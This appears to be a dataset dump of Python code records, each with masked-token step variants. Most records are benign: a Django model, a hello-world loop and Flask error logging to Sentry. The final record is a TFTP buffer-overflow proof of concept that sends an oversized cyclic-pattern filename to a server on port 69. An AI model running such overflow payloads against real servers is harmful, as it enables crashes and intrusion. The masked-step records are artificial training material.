code
stringlengths
13
6.09M
order_type
stringclasses
2 values
original_example
dict
step_ids
listlengths
1
5
from django.db import models # Create your models here. class person(models.Model): name=models.CharField(max_length=20,unique=True) age=models.IntegerField() email=models.CharField(max_length=20,unique=True) phone=models.CharField(max_length=10, unique=True) gender=models.CharField(max_length=10) locations=[('ind',"india"),('aus',"AUS")] location=models.CharField(max_length=10,choices=locations) marital_status=models.CharField(max_length=10) def __unicode__(self): return self.name
normal
{ "blob_id": "efe5df4005dbdb04cf4e7da1f350dab483c94c92", "index": 4459, "step-1": "<mask token>\n\n\nclass person(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass person(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __unicode__(self):\n return self.name\n", "step-3": "<mask token>\n\n\nclass person(models.Model):\n name = models.CharField(max_length=20, unique=True)\n age = models.IntegerField()\n email = models.CharField(max_length=20, unique=True)\n phone = models.CharField(max_length=10, unique=True)\n gender = models.CharField(max_length=10)\n locations = [('ind', 'india'), ('aus', 'AUS')]\n location = models.CharField(max_length=10, choices=locations)\n marital_status = models.CharField(max_length=10)\n\n def __unicode__(self):\n return self.name\n", "step-4": "from django.db import models\n\n\nclass person(models.Model):\n name = models.CharField(max_length=20, unique=True)\n age = models.IntegerField()\n email = models.CharField(max_length=20, unique=True)\n phone = models.CharField(max_length=10, unique=True)\n gender = models.CharField(max_length=10)\n locations = [('ind', 'india'), ('aus', 'AUS')]\n location = models.CharField(max_length=10, choices=locations)\n marital_status = models.CharField(max_length=10)\n\n def __unicode__(self):\n return self.name\n", "step-5": "from django.db import models\n\n# Create your models here.\nclass person(models.Model):\n name=models.CharField(max_length=20,unique=True)\n age=models.IntegerField()\n email=models.CharField(max_length=20,unique=True)\n phone=models.CharField(max_length=10, unique=True)\n gender=models.CharField(max_length=10)\n locations=[('ind',\"india\"),('aus',\"AUS\")]\n location=models.CharField(max_length=10,choices=locations)\n marital_status=models.CharField(max_length=10)\n def __unicode__(self):\n return self.name\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
def Hello_worlder(x): a = [] for i in range(x): a.append('Hello world') for i in a: print(i) Hello_worlder(10)
normal
{ "blob_id": "4f116f3eec9198a56a047ab42ed8e018ebb794bb", "index": 3528, "step-1": "<mask token>\n", "step-2": "def Hello_worlder(x):\n a = []\n for i in range(x):\n a.append('Hello world')\n for i in a:\n print(i)\n\n\n<mask token>\n", "step-3": "def Hello_worlder(x):\n a = []\n for i in range(x):\n a.append('Hello world')\n for i in a:\n print(i)\n\n\nHello_worlder(10)\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> @got_request_exception.connect def log_exception_to_sentry(app, exception=None, **kwargs): """ Logs an exception to sentry. :param app: The current application :param exception: The exception that occurred """ sentry.captureException(exception) <|reserved_special_token_1|> <|reserved_special_token_0|> app = Flask(__name__) sentry = Sentry(dsn=app.config['SENTRY_DSN']) @got_request_exception.connect def log_exception_to_sentry(app, exception=None, **kwargs): """ Logs an exception to sentry. :param app: The current application :param exception: The exception that occurred """ sentry.captureException(exception) <|reserved_special_token_1|> from flask import Flask from raven.contrib.flask import Sentry from flask.signals import got_request_exception app = Flask(__name__) sentry = Sentry(dsn=app.config['SENTRY_DSN']) @got_request_exception.connect def log_exception_to_sentry(app, exception=None, **kwargs): """ Logs an exception to sentry. :param app: The current application :param exception: The exception that occurred """ sentry.captureException(exception)
flexible
{ "blob_id": "f739fb56eae1ada2409ef7d75958bad2018f5134", "index": 2743, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\n@got_request_exception.connect\ndef log_exception_to_sentry(app, exception=None, **kwargs):\n \"\"\"\n Logs an exception to sentry.\n\n :param app: The current application\n :param exception: The exception that occurred\n \"\"\"\n sentry.captureException(exception)\n", "step-3": "<mask token>\napp = Flask(__name__)\nsentry = Sentry(dsn=app.config['SENTRY_DSN'])\n\n\n@got_request_exception.connect\ndef log_exception_to_sentry(app, exception=None, **kwargs):\n \"\"\"\n Logs an exception to sentry.\n\n :param app: The current application\n :param exception: The exception that occurred\n \"\"\"\n sentry.captureException(exception)\n", "step-4": "from flask import Flask\nfrom raven.contrib.flask import Sentry\nfrom flask.signals import got_request_exception\napp = Flask(__name__)\nsentry = Sentry(dsn=app.config['SENTRY_DSN'])\n\n\n@got_request_exception.connect\ndef log_exception_to_sentry(app, exception=None, **kwargs):\n \"\"\"\n Logs an exception to sentry.\n\n :param app: The current application\n :param exception: The exception that occurred\n \"\"\"\n sentry.captureException(exception)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#!/usr/bin/python import socket import sys host = '10.211.55.5' port = 69 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "socket() failed" sys.exit(1) filename = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk" mode = "netascii" buf = "\x00\x02" + filename+ "\0" + mode+ "\0" s.sendto(buf, (host, port))
normal
{ "blob_id": "b318f5d443dbf8e4442707839649149e75653295", "index": 5917, "step-1": "#!/usr/bin/python \nimport socket \nimport sys\n\nhost = '10.211.55.5' \nport = 69\ntry:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \nexcept:\n print \"socket() failed\" \n sys.exit(1)\nfilename = \"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8F